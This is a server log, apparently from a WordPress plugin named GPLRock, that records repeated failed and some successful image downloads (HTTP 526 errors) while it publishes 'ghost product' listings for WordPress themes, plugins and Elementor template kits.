Retrying... [05-Apr-2026 18:23:49 UTC] GPLRock: Image download failed for product specto-cinema-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/specto---cinema-wordpress-theme-2092.webp for product specto-cinema-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:23:52 UTC] GPLRock: Image download failed for product specto-cinema-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:54 UTC] GPLRock: Image download failed for product specto-cinema-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/specto---cinema-wordpress-theme-2092.webp for product specto-cinema-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:23:56 UTC] GPLRock WARNING: Image download failed for product specto-cinema-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/specto---cinema-wordpress-theme-2092.webp [05-Apr-2026 18:23:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: specto-cinema-wordpress-theme [05-Apr-2026 18:23:56 UTC] GPLRock: Image download failed for product finlab-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:58 UTC] GPLRock: Image download failed for product finlab-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finlab--business-consulting-wordpress-theme-20933.webp for product finlab-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:00 UTC] GPLRock: Image download failed for product finlab-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:02 UTC] GPLRock: Image download failed for product finlab-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finlab--business-consulting-wordpress-theme-20933.webp for product finlab-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:04 UTC] GPLRock WARNING: Image download failed for product finlab-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/finlab--business-consulting-wordpress-theme-20933.webp [05-Apr-2026 18:24:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finlab-business-consulting-wordpress-theme [05-Apr-2026 18:24:05 UTC] GPLRock: Image download failed for product towngov-city-government-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:07 UTC] GPLRock: Image download failed for product towngov-city-government-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/towngov---city-government-wordpress-theme-11113.webp for product towngov-city-government-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:09 UTC] GPLRock: Image download failed for product towngov-city-government-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:11 UTC] GPLRock: Image download failed for product towngov-city-government-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/towngov---city-government-wordpress-theme-11113.webp for product towngov-city-government-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:13 UTC] GPLRock WARNING: Image download failed for product towngov-city-government-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/towngov---city-government-wordpress-theme-11113.webp [05-Apr-2026 18:24:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: towngov-city-government-wordpress-theme [05-Apr-2026 18:24:13 UTC] GPLRock: Image download failed for product softwerk-software-saas-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:15 UTC] GPLRock: Image download failed for product softwerk-software-saas-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/softwerk---software--saas-startup-wordpress-theme-22529.webp for product softwerk-software-saas-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:18 UTC] GPLRock: Image download failed for product softwerk-software-saas-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:20 UTC] GPLRock: Image download failed for product softwerk-software-saas-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/softwerk---software--saas-startup-wordpress-theme-22529.webp for product softwerk-software-saas-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:22 UTC] GPLRock WARNING: Image download failed for product softwerk-software-saas-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/softwerk---software--saas-startup-wordpress-theme-22529.webp [05-Apr-2026 18:24:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: softwerk-software-saas-startup-wordpress-theme [05-Apr-2026 18:24:22 UTC] GPLRock: Image download failed for product whal-digital-marketing-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:24 UTC] GPLRock: Image download failed for product whal-digital-marketing-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whal---digital-marketing--seo-wordpress-theme-30395.webp for product whal-digital-marketing-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:26 UTC] GPLRock: Image download failed for product whal-digital-marketing-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:29 UTC] GPLRock: Image download failed for product whal-digital-marketing-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whal---digital-marketing--seo-wordpress-theme-30395.webp for product whal-digital-marketing-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:31 UTC] GPLRock WARNING: Image download failed for product whal-digital-marketing-seo-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/whal---digital-marketing--seo-wordpress-theme-30395.webp [05-Apr-2026 18:24:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: whal-digital-marketing-seo-wordpress-theme [05-Apr-2026 18:24:31 UTC] GPLRock: Image download failed for product react-theme-designer-for-wordpress-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:33 UTC] GPLRock: Image download failed for product react-theme-designer-for-wordpress-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/react--theme-designer-for-wordpress--woocommerce-33097.webp for product react-theme-designer-for-wordpress-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:35 UTC] GPLRock: Image download failed for product react-theme-designer-for-wordpress-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:37 UTC] GPLRock: Image download failed for product react-theme-designer-for-wordpress-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/react--theme-designer-for-wordpress--woocommerce-33097.webp for product react-theme-designer-for-wordpress-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:39 UTC] GPLRock WARNING: Image download failed for product react-theme-designer-for-wordpress-woocommerce. URL: https://meldwp.com/wp-content/uploads/react--theme-designer-for-wordpress--woocommerce-33097.webp [05-Apr-2026 18:24:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: react-theme-designer-for-wordpress-woocommerce [05-Apr-2026 18:24:40 UTC] GPLRock: Image download failed for product collective-minimal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:42 UTC] GPLRock: Image download failed for product collective-minimal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/collective---minimal-wordpress-theme-30321.webp for product collective-minimal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:44 UTC] GPLRock: Image download failed for product collective-minimal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:46 UTC] GPLRock: Image download failed for product collective-minimal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/collective---minimal-wordpress-theme-30321.webp for product collective-minimal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:48 UTC] GPLRock WARNING: Image download failed for product collective-minimal-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/collective---minimal-wordpress-theme-30321.webp [05-Apr-2026 18:24:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: collective-minimal-wordpress-theme [05-Apr-2026 18:24:48 UTC] GPLRock: Image download failed for product bootsland-saas-software-agency-app-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:50 UTC] GPLRock: Image download failed for product bootsland-saas-software-agency-app-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bootsland---saas-software-agency-app-wordpress-theme-16902.webp for product bootsland-saas-software-agency-app-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:53 UTC] GPLRock: Image download failed for product bootsland-saas-software-agency-app-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:55 UTC] GPLRock: Image download failed for product bootsland-saas-software-agency-app-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:24:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bootsland---saas-software-agency-app-wordpress-theme-16902.webp for product bootsland-saas-software-agency-app-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:24:57 UTC] GPLRock WARNING: Image download failed for product bootsland-saas-software-agency-app-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bootsland---saas-software-agency-app-wordpress-theme-16902.webp [05-Apr-2026 18:24:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bootsland-saas-software-agency-app-wordpress-theme [05-Apr-2026 18:25:22 UTC] GPLRock: Image downloaded successfully for product ultimate-bundle-one-for-wpbakery-page-builder-formerly-visual-composer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-26c91f87.webp [05-Apr-2026 18:25:22 UTC] GPLRock: Using pre-downloaded image for product ultimate-bundle-one-for-wpbakery-page-builder-formerly-visual-composer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-26c91f87.webp [05-Apr-2026 18:25:22 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-bundle-one-for-wpbakery-page-builder-formerly-visual-composer [05-Apr-2026 18:25:22 UTC] GPLRock: Image download failed for product chatbubble-wordpress-all-in-one-social-support-floating-button (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:24 UTC] GPLRock: Image download failed for product chatbubble-wordpress-all-in-one-social-support-floating-button (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chatbubble---wordpress-all-in-one-social-support-floating-button-17088.webp for product chatbubble-wordpress-all-in-one-social-support-floating-button after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:25:27 UTC] GPLRock: Image download failed for product chatbubble-wordpress-all-in-one-social-support-floating-button (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:29 UTC] GPLRock: Image download failed for product chatbubble-wordpress-all-in-one-social-support-floating-button (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chatbubble---wordpress-all-in-one-social-support-floating-button-17088.webp for product chatbubble-wordpress-all-in-one-social-support-floating-button after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:25:31 UTC] GPLRock WARNING: Image download failed for product chatbubble-wordpress-all-in-one-social-support-floating-button. URL: https://meldwp.com/wp-content/uploads/chatbubble---wordpress-all-in-one-social-support-floating-button-17088.webp [05-Apr-2026 18:25:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chatbubble-wordpress-all-in-one-social-support-floating-button [05-Apr-2026 18:25:33 UTC] GPLRock: Image downloaded successfully for product advertisement-branding-custom-content-for-flow-flow (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-52b949b6.webp [05-Apr-2026 18:25:33 UTC] GPLRock: Using pre-downloaded image for product advertisement-branding-custom-content-for-flow-flow: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-52b949b6.webp [05-Apr-2026 18:25:33 UTC] GPLRock: Ghost product published with image - Product ID: advertisement-branding-custom-content-for-flow-flow [05-Apr-2026 18:25:36 UTC] GPLRock: Image download failed for product reformer-multichannel-contact-form-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:38 UTC] GPLRock: Image download failed for product reformer-multichannel-contact-form-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reformer--multichannel-contact-form-for-elementor-30905.webp for product reformer-multichannel-contact-form-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:25:40 UTC] GPLRock: Image download failed for product reformer-multichannel-contact-form-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:42 UTC] GPLRock: Image download failed for product reformer-multichannel-contact-form-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reformer--multichannel-contact-form-for-elementor-30905.webp for product reformer-multichannel-contact-form-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:25:44 UTC] GPLRock WARNING: Image download failed for product reformer-multichannel-contact-form-for-elementor. URL: https://meldwp.com/wp-content/uploads/reformer--multichannel-contact-form-for-elementor-30905.webp [05-Apr-2026 18:25:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: reformer-multichannel-contact-form-for-elementor [05-Apr-2026 18:25:46 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-green-popups-formerly-layered-popups (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:48 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-green-popups-formerly-layered-popups (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress---green-popups-formerly-layered-popups-19375.webp for product popup-plugin-for-wordpress-green-popups-formerly-layered-popups after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:25:50 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-green-popups-formerly-layered-popups (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:53 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-green-popups-formerly-layered-popups (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress---green-popups-formerly-layered-popups-19375.webp for product popup-plugin-for-wordpress-green-popups-formerly-layered-popups after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:25:55 UTC] GPLRock WARNING: Image download failed for product popup-plugin-for-wordpress-green-popups-formerly-layered-popups. URL: https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress---green-popups-formerly-layered-popups-19375.webp [05-Apr-2026 18:25:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: popup-plugin-for-wordpress-green-popups-formerly-layered-popups [05-Apr-2026 18:25:56 UTC] GPLRock: Image download failed for product wpfa-woocommerce-product-finder-assistant (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:25:58 UTC] GPLRock: Image download failed for product wpfa-woocommerce-product-finder-assistant (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:26:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpfa---woocommerce-product-finder-assistant-16172.webp for product wpfa-woocommerce-product-finder-assistant after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:26:01 UTC] GPLRock: Image download failed for product wpfa-woocommerce-product-finder-assistant (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:26:03 UTC] GPLRock: Image download failed for product wpfa-woocommerce-product-finder-assistant (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:26:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpfa---woocommerce-product-finder-assistant-16172.webp for product wpfa-woocommerce-product-finder-assistant after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:26:05 UTC] GPLRock WARNING: Image download failed for product wpfa-woocommerce-product-finder-assistant. URL: https://meldwp.com/wp-content/uploads/wpfa---woocommerce-product-finder-assistant-16172.webp [05-Apr-2026 18:26:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpfa-woocommerce-product-finder-assistant [05-Apr-2026 18:26:06 UTC] GPLRock: Image download failed for product egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:36:54 UTC] GPLRock: Image downloaded successfully for product carepress-pet-care-veterinary-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-45f8996f.webp [05-Apr-2026 18:36:55 UTC] GPLRock: Using pre-downloaded image for product carepress-pet-care-veterinary-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-45f8996f.webp [05-Apr-2026 18:36:55 UTC] GPLRock: Ghost product published with image - Product ID: carepress-pet-care-veterinary-elementor-template-kit [05-Apr-2026 18:36:56 UTC] GPLRock: Image downloaded successfully for product careo-elderly-senior-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99ca2ca6.webp [05-Apr-2026 18:36:56 UTC] GPLRock: Using pre-downloaded image for product careo-elderly-senior-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99ca2ca6.webp [05-Apr-2026 18:36:56 UTC] GPLRock: Ghost product published with image - Product ID: careo-elderly-senior-care-elementor-template-kit [05-Apr-2026 18:36:58 UTC] GPLRock: Image downloaded successfully for product carenow-medical-dentist-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53e37330.jpg [05-Apr-2026 18:36:58 UTC] GPLRock: Using pre-downloaded image for product carenow-medical-dentist-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53e37330.jpg [05-Apr-2026 18:36:58 UTC] GPLRock: Ghost product published with image - Product ID: carenow-medical-dentist-elementor-template-kit [05-Apr-2026 18:36:59 UTC] GPLRock: Image downloaded successfully for product careerster-cv-resume-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ce7cd89.webp [05-Apr-2026 18:37:00 UTC] GPLRock: Using pre-downloaded image for product careerster-cv-resume-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ce7cd89.webp [05-Apr-2026 18:37:00 UTC] GPLRock: Ghost product published with image - Product ID: careerster-cv-resume-elementor-template-kit [05-Apr-2026 18:37:01 UTC] GPLRock: Image downloaded successfully for product cardealerz-auto-dealer-auto-shop-website-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9f84ad75.webp [05-Apr-2026 18:37:01 UTC] GPLRock: Using pre-downloaded image for product cardealerz-auto-dealer-auto-shop-website-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9f84ad75.webp [05-Apr-2026 18:37:01 UTC] GPLRock: Ghost product published with image - Product ID: cardealerz-auto-dealer-auto-shop-website-elementor-template-kit [05-Apr-2026 18:37:03 UTC] GPLRock: Image downloaded successfully for product buildoit-construction-building-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b26cfb5a.webp [05-Apr-2026 18:37:03 UTC] GPLRock: Using pre-downloaded image for product buildoit-construction-building-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b26cfb5a.webp [05-Apr-2026 18:37:03 UTC] GPLRock: Ghost product published with image - Product ID: buildoit-construction-building-elementor-template-kit [05-Apr-2026 18:37:04 UTC] GPLRock: Image downloaded successfully for product buildeso-construction-building-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73ff6049.webp [05-Apr-2026 18:37:04 UTC] GPLRock: Using pre-downloaded image for product buildeso-construction-building-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73ff6049.webp [05-Apr-2026 18:37:04 UTC] GPLRock: Ghost product published with image - Product ID: buildeso-construction-building-elementor-template-kit [05-Apr-2026 18:37:06 UTC] GPLRock: Image downloaded successfully for product blumedia-book-publisher-book-author-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-256c4c2d.jpg [05-Apr-2026 18:37:06 UTC] GPLRock: Using pre-downloaded image for product blumedia-book-publisher-book-author-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-256c4c2d.jpg [05-Apr-2026 18:37:06 UTC] GPLRock: Ghost product published with image - Product ID: blumedia-book-publisher-book-author-elementor-template-kit [05-Apr-2026 18:37:07 UTC] GPLRock: Image downloaded successfully for product bluechip-apartment-property-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3dce8c44.webp [05-Apr-2026 18:37:07 UTC] GPLRock: Using pre-downloaded image for product bluechip-apartment-property-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3dce8c44.webp [05-Apr-2026 18:37:07 UTC] GPLRock: Ghost product published with image - Product ID: bluechip-apartment-property-elementor-template-kit [05-Apr-2026 18:37:09 UTC] GPLRock: Image downloaded successfully for product blogga-instagram-blogger-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35369774.webp [05-Apr-2026 18:37:09 UTC] GPLRock: Using pre-downloaded image for product blogga-instagram-blogger-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35369774.webp [05-Apr-2026 18:37:09 UTC] GPLRock: Ghost product published with image - Product ID: blogga-instagram-blogger-elementor-template-kit [05-Apr-2026 18:39:45 UTC] GPLRock: Image download failed for product jannah-newspaper-magazine-news-buddypress-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:39:47 UTC] GPLRock: Image download failed for product jannah-newspaper-magazine-news-buddypress-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:39:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jannah---newspaper-magazine-news-buddypress-wordpress-theme-29108.webp for product jannah-newspaper-magazine-news-buddypress-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:39:49 UTC] GPLRock: Image download failed for product jannah-newspaper-magazine-news-buddypress-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:39:51 UTC] GPLRock: Image download failed for product jannah-newspaper-magazine-news-buddypress-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:39:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jannah---newspaper-magazine-news-buddypress-wordpress-theme-29108.webp for product jannah-newspaper-magazine-news-buddypress-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:39:53 UTC] GPLRock WARNING: Image download failed for product jannah-newspaper-magazine-news-buddypress-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jannah---newspaper-magazine-news-buddypress-wordpress-theme-29108.webp [05-Apr-2026 18:39:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jannah-newspaper-magazine-news-buddypress-wordpress-theme [05-Apr-2026 18:39:53 UTC] GPLRock: Image download failed for product marki-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:39:55 UTC] GPLRock: Image download failed for product marki-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:39:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marki---digital-marketing-agency-wordpress-theme-5668.webp for product marki-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:39:58 UTC] GPLRock: Image download failed for product marki-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:00 UTC] GPLRock: Image download failed for product marki-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marki---digital-marketing-agency-wordpress-theme-5668.webp for product marki-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:02 UTC] GPLRock WARNING: Image download failed for product marki-digital-marketing-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/marki---digital-marketing-agency-wordpress-theme-5668.webp [05-Apr-2026 18:40:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marki-digital-marketing-agency-wordpress-theme [05-Apr-2026 18:40:04 UTC] GPLRock: Image download failed for product real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:06 UTC] GPLRock: Image download failed for product real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/real-estate-wordpress-theme-4416.webp for product real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:08 UTC] GPLRock: Image download failed for product real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:11 UTC] GPLRock: Image download failed for product real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/real-estate-wordpress-theme-4416.webp for product real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:13 UTC] GPLRock WARNING: Image download failed for product real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/real-estate-wordpress-theme-4416.webp [05-Apr-2026 18:40:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: real-estate-wordpress-theme [05-Apr-2026 18:40:13 UTC] GPLRock: Image download failed for product kanni-home-automation-cctv-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:15 UTC] GPLRock: Image download failed for product kanni-home-automation-cctv-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kanni---home-automation-cctv-security-wordpress-theme-21373.webp for product kanni-home-automation-cctv-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:17 UTC] GPLRock: Image download failed for product kanni-home-automation-cctv-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . 